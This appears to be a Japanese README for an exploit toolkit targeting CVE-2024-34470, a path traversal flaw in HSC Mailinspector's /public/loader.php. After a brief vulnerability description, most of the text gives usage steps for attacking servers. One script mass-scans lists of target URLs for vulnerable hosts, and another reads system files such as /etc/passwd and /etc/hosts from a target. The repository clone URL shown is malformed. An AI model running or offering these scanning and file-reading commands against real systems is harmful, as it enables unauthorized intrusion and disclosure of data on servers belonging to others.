
HSC Mailinspector バージョン5.2.18以前に重大な脆弱性が発見されました。この脆弱性は、ファイル /public/loader.php の未知の機能に影響します。
HSC Mailinspector バージョン 5.2.18 以前で、重大な脆弱性が発見されました。この脆弱性は、/public/loader.php ファイルの不明な機能に影響します。'path' 引数を不明な入力で操作すると、パストラバーサル脆弱性が発生します。CWE によると、この問題は CWE-22 に分類されます。この製品は、外部入力を使用して、制限された親ディレクトリの下にあるファイルまたはディレクトリを識別するためのパス名を構築しますが、パス名が制限されたディレクトリの外側の場所に解決される原因となる可能性のある、パス名内の特殊要素を適切に中和しません。これは、機密性、完全性、および可用性に影響します。
リポジトリのクローン:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
依存関係のインストール
Python と pip がインストールされていることを確認してください。次に、以下を実行します:
pip install -r requirements.txt
テキストファイルを使用して複数のターゲットを検索するには、スクリプト Massive_CVE-2024-34470.py を使用します
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
urls.txt ファイルの形式は次のとおりです:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
脆弱なターゲットが特定されたら、CVE-2024-34470.py というスクリプトを使用して、ターミナルを通じて指定されたコンテンツを悪用して表示します。
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)